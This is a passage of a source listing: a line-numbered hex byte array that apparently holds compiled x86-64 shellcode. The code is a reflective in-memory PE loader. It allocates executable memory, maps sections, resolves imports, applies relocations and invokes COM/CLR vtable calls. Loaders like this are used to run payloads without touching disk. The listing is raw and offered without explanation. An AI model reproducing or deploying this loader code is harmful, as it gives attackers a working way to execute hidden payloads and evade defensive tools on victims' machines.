400 | 0x00, 0x4c, 0x8d, 0x45, 0x70, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b, 0x8d, | |
401 | 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, | |
402 | 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x79, 0x25, 0x48, 0x8b, 0x85, | |
403 | 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, | |
404 | 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, | |
405 | 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, | |
406 | 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b, 0x85, 0xb0, 0x00, | |
407 | 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x39, | |
408 | 0xc2, 0x0f, 0x87, 0x51, 0xff, 0xff, 0xff, 0x83, 0xbd, 0xac, 0x00, 0x00, | |
409 | 0x00, 0x00, 0x0f, 0x88, 0x95, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, | |
410 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00, 0x48, 0x8b, | |
411 | 0x80, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00, | |
412 | 0x48, 0x8b, 0x4a, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55, 0xc0, | |
413 | 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55, 0x20, | |
414 | 0x48, 0x89, 0x55, 0xd0, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x4c, | |
415 | 0x8d, 0x45, 0x50, 0x4c, 0x89, 0x44, 0x24, 0x30, 0x4c, 0x8b, 0x85, 0xb8, | |
416 | 0x00, 0x00, 0x00, 0x4c, 0x89, 0x44, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0xc0, | |
417 | 0x4c, 0x89, 0x44, 0x24, 0x20, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, | |
418 | 0xb8, 0x18, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, | |
419 | 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x74, 0x1a, 0x48, | |
420 | 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, | |
421 | 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, | |
422 | 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, | |
423 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x48, 0x89, | |
424 | 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
425 | 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x00, 0x00, 0x00, | |
426 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81, | |
427 | 0xc4, 0x48, 0x01, 0x00, 0x00, 0x5b, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, | |
428 | 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, | |
429 | 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74, | |
430 | 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00, | |
431 | 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x30, | |
432 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, | |
433 | 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, | |
434 | 0x38, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, | |
435 | 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, | |
436 | 0x18, 0x48, 0x8b, 0x52, 0x38, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, | |
437 | 0x45, 0x18, 0x48, 0xc7, 0x40, 0x38, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
438 | 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, | |
439 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b, | |
440 | 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x28, 0x48, 0x89, | |
441 | 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x28, 0x00, | |
442 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48, | |
443 | 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, | |
444 | 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, | |
445 | 0x8b, 0x52, 0x20, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, | |
446 | 0x48, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, | |
447 | 0x48, 0x8b, 0x40, 0x18, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, | |
448 | 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, | |
449 | 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x89, 0xd1, 0xff, | |
450 | 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00, | |
451 | 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x85, 0xc0, | |
452 | 0x74, 0x44, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, | |
453 | 0x00, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, | |
454 | 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, | |
455 | 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, | |
456 | 0x18, 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, | |
457 | 0x45, 0x18, 0x48, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
458 | 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, | |
459 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, | |
460 | 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x08, 0x48, 0x89, | |
461 | 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00, | |
462 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x85, | |
463 | 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, | |
464 | 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x12, | |
465 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00, | |
466 | 0x00, 0x00, 0x00, 0x00, 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, | |
467 | 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb, | |
468 | 0x0a, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45, 0x18, 0x01, 0x48, | |
469 | 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x12, 0x48, 0x8b, | |
470 | 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, | |
471 | 0x38, 0xc2, 0x74, 0xd9, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x0f, | |
472 | 0xb6, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x0f, 0xb6, 0xc0, | |
473 | 0x29, 0xc2, 0x89, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0xd0, 0x01, | |
474 | 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, | |
475 | 0x8d, 0x60, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x08, 0x01, 0x00, 0x00, | |
476 | 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x10, 0x01, 0x00, 0x00, 0x00, | |
477 | 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x31, 0xc0, 0x48, 0x79, 0xc7, 0x45, | |
478 | 0xa4, 0x1b, 0x8b, 0x44, 0x24, 0xc7, 0x45, 0xa8, 0x04, 0x8b, 0x4c, 0x24, | |
479 | 0xc7, 0x45, 0xac, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x45, 0xb0, 0x0c, 0x52, | |
480 | 0x81, 0xc2, 0xc7, 0x45, 0xb4, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xb8, | |
481 | 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x45, 0xbc, 0xf4, 0xff, 0xd0, 0xc3, 0xc7, | |
482 | 0x45, 0xc0, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x45, 0xc4, 0x01, 0x00, 0x00, | |
483 | 0x48, 0xc7, 0x45, 0xc8, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x45, 0xcc, 0x01, | |
484 | 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd0, 0x89, 0x9c, 0x24, 0x38, 0xc7, 0x45, | |
485 | 0xd4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd8, 0x89, 0xbc, 0x24, 0x20, | |
486 | 0xc7, 0x45, 0xdc, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe0, 0x89, 0xb4, | |
487 | 0x24, 0x28, 0xc7, 0x45, 0xe4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe8, | |
488 | 0x89, 0xe6, 0x48, 0x89, 0xc7, 0x45, 0xec, 0xcf, 0xb8, 0x00, 0x02, 0xc7, | |
489 | 0x45, 0xf0, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x45, 0xf4, 0xc1, 0x48, 0x8d, | |
490 | 0x14, 0xc7, 0x45, 0xf8, 0x01, 0x4c, 0x8d, 0x04, 0xc7, 0x45, 0xfc, 0x02, | |
491 | 0x4d, 0x8d, 0x0c, 0xc7, 0x45, 0x00, 0x00, 0x49, 0x8d, 0x1c, 0xc7, 0x45, | |
492 | 0x04, 0x01, 0x48, 0x89, 0x9c, 0xc7, 0x45, 0x08, 0x24, 0x00, 0x01, 0x00, | |
493 | 0xc7, 0x45, 0x0c, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x45, 0x10, 0x48, 0x89, | |
494 | 0x9c, 0x24, 0xc7, 0x45, 0x14, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x45, 0x18, | |
495 | 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x45, 0x1c, 0x89, 0x9c, 0x24, 0x10, 0xc7, | |
496 | 0x45, 0x20, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x24, 0x01, 0xc3, 0x48, | |
497 | 0x89, 0xc7, 0x45, 0x28, 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x45, 0x2c, 0x00, | |
498 | 0x00, 0xff, 0xd7, 0xc7, 0x45, 0x30, 0x48, 0x89, 0xf4, 0x48, 0xc7, 0x45, | |
499 | 0x34, 0x8b, 0xb4, 0x24, 0x28, 0xc7, 0x45, 0x38, 0x01, 0x00, 0x00, 0x48, | |
500 | 0xc7, 0x45, 0x3c, 0x8b, 0xbc, 0x24, 0x20, 0xc7, 0x45, 0x40, 0x01, 0x00, | |
501 | 0x00, 0x48, 0xc7, 0x45, 0x44, 0x8b, 0x9c, 0x24, 0x38, 0xc7, 0x45, 0x48, | |
502 | 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x4c, 0x8b, 0xac, 0x24, 0x30, 0xc7, | |
503 | 0x45, 0x50, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x54, 0x81, 0xc4, 0x48, | |
504 | 0x01, 0xc7, 0x45, 0x58, 0x00, 0x00, 0xc3, 0x00, 0x48, 0x8b, 0x85, 0x60, | |
505 | 0x01, 0x00, 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, | |
506 | 0x75, 0x16, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48, | |
507 | 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0xeb, 0x15, | |
508 | 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, | |
509 | 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
510 | 0x18, 0x01, 0x00, 0x00, 0x48, 0x05, 0x18, 0x19, 0x00, 0x00, 0x48, 0x89, | |
511 | 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00, | |
512 | 0x48, 0x89, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x00, | |
513 | 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x00, | |
514 | 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xf0, 0x00, 0x00, | |
515 | 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x40, | |
516 | 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x00, | |
517 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85, | |
518 | 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x8b, | |
519 | 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, | |
520 | 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
521 | 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x50, 0x04, 0x48, 0x8b, 0x85, | |
522 | 0xd8, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x04, 0x66, 0x39, 0xc2, 0x0f, | |
523 | 0x85, 0xa1, 0x06, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, | |
524 | 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xf0, 0x00, 0x00, 0x00, 0x8b, | |
525 | 0x52, 0x50, 0x81, 0xc2, 0x00, 0x10, 0x00, 0x00, 0x89, 0xd2, 0x41, 0xb9, | |
526 | 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00, | |
527 | 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x08, 0x01, 0x00, 0x00, | |
528 | 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x5f, 0x06, | |
529 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, | |
530 | 0x14, 0x0f, 0xb7, 0xd0, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48, | |
531 | 0x01, 0xd0, 0x48, 0x83, 0xc0, 0x18, 0x48, 0x89, 0x85, 0xd0, 0x00, 0x00, | |
532 | 0x00, 0xc7, 0x85, 0x24, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, | |
533 | 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x24, 0x01, 0x00, 0x00, 0x48, 0x89, | |
534 | 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, | |
535 | 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x01, | |
536 | 0xd0, 0x8b, 0x40, 0x10, 0x41, 0x89, 0xc0, 0x8b, 0x95, 0x24, 0x01, 0x00, | |
537 | 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, | |
538 | 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00, | |
539 | 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x14, 0x89, 0xc2, 0x48, 0x8b, 0x85, | |
540 | 0x00, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x8b, 0x95, 0x24, 0x01, | |
541 | 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, | |
542 | 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, | |
543 | 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, | |
544 | 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0xca, 0x48, | |
545 | 0x89, 0xc1, 0xe8, 0x4d, 0x20, 0x00, 0x00, 0x83, 0x85, 0x24, 0x01, 0x00, | |
546 | 0x00, 0x01, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, | |
547 | 0x06, 0x0f, 0xb7, 0xc0, 0x3b, 0x85, 0x24, 0x01, 0x00, 0x00, 0x0f, 0x87, | |
548 | 0x4c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, | |
549 | 0x80, 0x90, 0x00, 0x00, 0x00, 0x89, 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b, | |
550 | 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, | |
551 | 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0xe9, 0x39, | |
552 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x40, | |
553 | 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, | |
554 | 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, | |
555 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x95, 0xc0, 0x00, | |
556 | 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00, | |
557 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89, | |
558 | 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, | |
559 | 0x89, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, | |
560 | 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, | |
561 | 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x40, 0x01, 0x00, 0x00, 0x48, | |
562 | 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, | |
563 | 0x0f, 0x84, 0xa9, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x40, 0x01, 0x00, | |
564 | 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48, | |
565 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x79, 0x30, 0x48, | |
566 | 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, | |
567 | 0x95, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x12, 0x0f, 0xb7, 0xd2, 0x48, | |
568 | 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2, 0x48, | |
569 | 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x47, 0x48, | |
570 | 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85, | |
571 | 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x00, | |
572 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, | |
573 | 0x38, 0x48, 0x8b, 0x95, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x02, | |
574 | 0x48, 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2, | |
575 | 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83, | |
576 | 0x85, 0x48, 0x01, 0x00, 0x00, 0x08, 0x48, 0x83, 0x85, 0x40, 0x01, 0x00, | |
577 | 0x00, 0x08, 0xe9, 0x44, 0xff, 0xff, 0xff, 0x90, 0x48, 0x83, 0x85, 0x38, | |
578 | 0x01, 0x00, 0x00, 0x14, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, | |
579 | 0x40, 0x0c, 0x85, 0xc0, 0x0f, 0x85, 0xb5, 0xfe, 0xff, 0xff, 0x48, 0x8b, | |
580 | 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x89, | |
581 | 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48, | |
582 | 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, | |
583 | 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48, | |
584 | 0x8b, 0x40, 0x30, 0x48, 0xf7, 0xd8, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, | |
585 | 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00, | |
586 | 0x00, 0x00, 0xe9, 0xdc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x01, | |
587 | 0x00, 0x00, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x85, 0x30, 0x01, 0x00, | |
588 | 0x00, 0xe9, 0x94, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, | |
589 | 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x64, | |
590 | 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48, | |
591 | 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff, | |
592 | 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, | |
593 | 0x00, 0x00, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, | |
594 | 0x8b, 0x00, 0x89, 0xc1, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f, | |
595 | 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc1, | |
596 | 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48, 0x8b, | |
597 | 0x08, 0x48, 0x8b, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48, | |
598 | 0x89, 0x02, 0xeb, 0x16, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f, | |
599 | 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0, 0x0f, 0x85, 0xd9, 0x02, | |
600 | 0x00, 0x00, 0x48, 0x83, 0x85, 0x30, 0x01, 0x00, 0x00, 0x02, 0x48, 0x8b, | |
601 | 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, | |
602 | 0x85, 0x28, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0x30, | |
603 | 0x01, 0x00, 0x00, 0x0f, 0x85, 0x49, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, | |
604 | 0x30, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x28, 0x01, 0x00, 0x00, 0x48, | |
605 | 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x85, | |
606 | 0x13, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x8b, | |
607 | 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x5b, 0x02, 0x00, 0x00, 0x48, 0x8b, | |
608 | 0x85, 0x18, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x80, 0x04, 0x06, 0x00, 0x00, | |
609 | 0x66, 0x85, 0xc0, 0x0f, 0x84, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
610 | 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x89, 0x85, | |
611 | 0xcc, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xcc, 0x00, 0x00, 0x00, 0x00, 0x0f, | |
612 | 0x84, 0x4a, 0x02, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48, | |
613 | 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, | |
614 | 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b, | |
615 | 0x40, 0x18, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x20, 0x01, | |
